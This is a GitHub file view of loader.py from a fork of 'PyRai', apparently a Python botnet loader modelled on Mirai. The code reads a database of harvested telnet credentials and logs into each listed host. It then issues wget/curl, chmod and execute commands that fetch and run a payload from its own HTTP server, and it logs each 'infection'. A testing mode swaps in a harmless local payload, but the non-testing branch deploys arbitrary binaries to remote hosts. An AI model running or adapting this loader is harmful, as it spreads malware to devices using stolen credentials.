forked from FlatL1neAPT/PyRai
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathloader.py
More file actions
353 lines (278 loc) · 12.4 KB
/
loader.py
File metadata and controls
353 lines (278 loc) · 12.4 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
#!/usr/bin/env python3
"""
PyRai Loader Module - Updated for Secure Testing
ETHICAL DISCLAIMER: This tool is for authorized testing only. Misuse is prohibited.
"""
import telnetlib
import sys
import os
import http.server
import socketserver
import logging
import time
from threading import Thread
from datetime import datetime
# modules
from libs import truecolors
# Configuration
__TESTING_MODE__ = True
__bin__ = "http://127.0.0.1:31338/test_payload.py" # Updated for testing
__webp_ = "31338"
__MAX_INFECTIONS__ = 10 if __TESTING_MODE__ else 1000 # Limit for testing
# Configure logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.FileHandler('loader.log'),
logging.StreamHandler()
]
)
infection_count = 0
def create_test_payload():
"""Create a harmless test payload for testing"""
bin_dir = os.path.join(os.path.dirname(__file__), 'bin')
if not os.path.exists(bin_dir):
os.makedirs(bin_dir)
payload_path = os.path.join(bin_dir, 'test_payload.py')
payload_content = '''#!/usr/bin/env python3
"""
PyRai Test Payload - Harmless Testing Version
ETHICAL DISCLAIMER: This is a test payload for authorized testing only.
"""
import os
import time
import sys
from datetime import datetime
def main():
print("="*50)
print("PyRai Test Payload Executed")
print(f"Timestamp: {datetime.now()}")
print(f"System: {os.name}")
print(f"PID: {os.getpid()}")
print("="*50)
# Create a test file to prove execution
test_file = "/tmp/pyrai_test.txt" if os.name != 'nt' else "C:\\\\temp\\\\pyrai_test.txt"
try:
with open(test_file, 'w') as f:
f.write(f"PyRai test execution at {datetime.now()}\\n")
print(f"Test file created: {test_file}")
except:
print("Could not create test file")
# Self-destruct (remove this file)
try:
time.sleep(2)
os.remove(__file__)
print("Payload self-destructed")
except:
print("Could not self-destruct")
print("Test payload completed successfully")
if __name__ == "__main__":
main()
'''
with open(payload_path, 'w') as f:
f.write(payload_content)
# Make executable on Unix systems
if os.name != 'nt':
os.chmod(payload_path, 0o755)
truecolors.print_succ(f"Test payload created: {payload_path}")
def ServeHTTP():
"""Start HTTP server to serve payloads"""
try:
web_dir = os.path.join(os.path.dirname(__file__), 'bin')
# Create bin directory and test payload if they don't exist
if not os.path.exists(web_dir):
os.makedirs(web_dir)
create_test_payload()
os.chdir(web_dir)
Handler = http.server.SimpleHTTPRequestHandler
# Custom handler to log requests
class LoggingHandler(Handler):
def log_message(self, format, *args):
truecolors.print_info(f"HTTP: {format % args}")
httpd = socketserver.TCPServer(("127.0.0.1" if __TESTING_MODE__ else "", int(__webp_)), LoggingHandler)
truecolors.print_info(f"Webserver started on port {__webp_}")
truecolors.print_info(f"Serving from: {web_dir}")
# Run server in background
server_thread = Thread(target=httpd.serve_forever, daemon=True)
server_thread.start()
return httpd
except Exception as e:
truecolors.print_errn(f"Failed to start webserver: {str(e)}")
return None
def doConsumeLogin(ip, port, user, pass_):
"""Enhanced login and payload deployment with safety checks"""
global infection_count
# Check infection limit
if infection_count >= __MAX_INFECTIONS__:
truecolors.print_warn(f"Reached infection limit of {__MAX_INFECTIONS__}")
return False
tn = None
need_user = False
max_attempts = 3
attempt_count = 0
try:
while attempt_count < max_attempts:
try:
if not tn:
asked_password_in_cnx = False
tn = telnetlib.Telnet(ip, port, timeout=10)
truecolors.print_info(f"[loader] Connection established to {ip}:{port}")
login_successful = False
while True:
response = tn.read_until(b":", 2)
response_str = str(response)
if "Login:" in response_str or "Username:" in response_str:
truecolors.print_info("[loader] Received username prompt")
need_user = True
asked_password_in_cnx = False
tn.write((user + "\n").encode('ascii'))
elif "Password:" in response_str:
if asked_password_in_cnx and need_user:
tn.close()
break
asked_password_in_cnx = True
if not need_user:
pass # Use provided credentials
if not pass_:
truecolors.print_errn("[loader] No password provided")
return False
truecolors.print_info("[loader] Received password prompt")
tn.write((pass_ + "\n").encode('ascii'))
if any(prompt in response_str for prompt in [">", "$", "#", "%"]):
login_successful = True
truecolors.print_succ(f"[loader] Login succeeded {ip}:{port} with {user}:{pass_}")
break
if login_successful:
# Deploy payload with enhanced safety
payload_name = os.path.basename(__bin__)
if __TESTING_MODE__:
# Safe testing commands
commands = [
f"cd /tmp || cd /var/tmp || cd .",
f"wget {__bin__} -O {payload_name} || curl -o {payload_name} {__bin__}",
f"chmod +x {payload_name}",
f"python3 {payload_name} || python {payload_name}",
f"rm -f {payload_name}"
]
else:
# Original commands for lab environment
commands = [
f"cd /tmp; cd /var/run; cd /mnt; cd /root",
f"wget {__bin__}",
f"chmod +x {payload_name}",
f"./{payload_name}",
f"rm -rf {payload_name}"
]
for cmd in commands:
truecolors.print_info(f"[loader] Executing: {cmd}")
tn.write((cmd + "\n").encode('ascii'))
time.sleep(1) # Give time for command execution
infection_count += 1
truecolors.print_succ(f"[loader] Infection completed on {ip}:{port}")
logging.info(f"Successful infection: {ip}:{port} with {user}:{pass_}")
return True
attempt_count += 1
except EOFError as e:
tn = None
need_user = False
truecolors.print_warn(f"[loader] Remote host dropped connection: {str(e)}")
attempt_count += 1
time.sleep(2)
except Exception as e:
truecolors.print_errn(f"[loader] Error during infection of {ip}:{port}: {str(e)}")
logging.error(f"Infection error {ip}:{port}: {str(e)}")
finally:
if tn:
try:
tn.close()
except:
pass
return False
def ForceDB(fname):
"""Process credential database with enhanced error handling"""
try:
if not os.path.isfile(fname):
truecolors.print_errn(f"Loader: File '{fname}' doesn't exist, check the path.")
return
truecolors.print_info(f"Processing credential database: {fname}")
processed = 0
successful = 0
with open(fname, 'r') as f:
for line_num, line in enumerate(f, 1):
line = line.strip()
# Skip comments and empty lines
if not line or line.startswith('#'):
continue
try:
parts = line.split(':')
if len(parts) < 4:
truecolors.print_warn(f"Invalid line format at line {line_num}: {line}")
continue
usr = parts[0].strip()
psw = parts[1].strip()
ip = parts[2].strip()
port = int(parts[3].strip())
truecolors.print_info(f"Attempting infection: {ip}:{port} with {usr}:{psw}")
if doConsumeLogin(ip, port, usr, psw):
successful += 1
processed += 1
# Rate limiting
time.sleep(1)
# Check limits
if infection_count >= __MAX_INFECTIONS__:
truecolors.print_warn("Reached maximum infection limit")
break
except ValueError as e:
truecolors.print_errn(f"Invalid port number at line {line_num}: {line}")
except Exception as e:
truecolors.print_errn(f"Error processing line {line_num}: {str(e)}")
truecolors.print_succ(f"Processing complete: {processed} processed, {successful} successful")
except KeyboardInterrupt:
truecolors.print_errn("Operation interrupted by user.")
except Exception as e:
truecolors.print_errn(f"Loader error: {str(e)}")
logging.error(f"Loader error: {str(e)}")
def print_banner():
"""Print startup banner"""
print("="*60)
print("PyRai Loader - Updated for Secure Testing")
print("ETHICAL DISCLAIMER: This tool is for authorized testing only.")
print("="*60)
def main():
"""Main loader function"""
print_banner()
if __TESTING_MODE__:
truecolors.print_warn("TESTING MODE ENABLED")
truecolors.print_warn(f"Max infections limited to: {__MAX_INFECTIONS__}")
if len(sys.argv) < 2:
truecolors.print_errn("Usage: python loader.py <credential_database>")
truecolors.print_info("Example: python loader.py dump/csdb.txt")
sys.exit(1)
# Safety confirmation
print("\n[SAFETY CONFIRMATION]")
print("This loader will attempt to deploy payloads to compromised systems.")
print("Ensure you have proper authorization for all target systems.")
confirm = input("Type 'AUTHORIZED' to continue: ")
if confirm != 'AUTHORIZED':
truecolors.print_errn("Safety confirmation failed. Exiting.")
sys.exit(1)
# Start HTTP server
httpd = ServeHTTP()
if not httpd:
truecolors.print_errn("Failed to start HTTP server. Exiting.")
sys.exit(1)
try:
# Process credential database
db_file = sys.argv[1]
ForceDB(db_file)
except KeyboardInterrupt:
truecolors.print_info("Shutdown signal received...")
finally:
if httpd:
truecolors.print_info("Shutting down HTTP server...")
httpd.shutdown()
httpd.server_close()
truecolors.print_succ("Loader shutdown complete.")
if __name__ == "__main__":
main()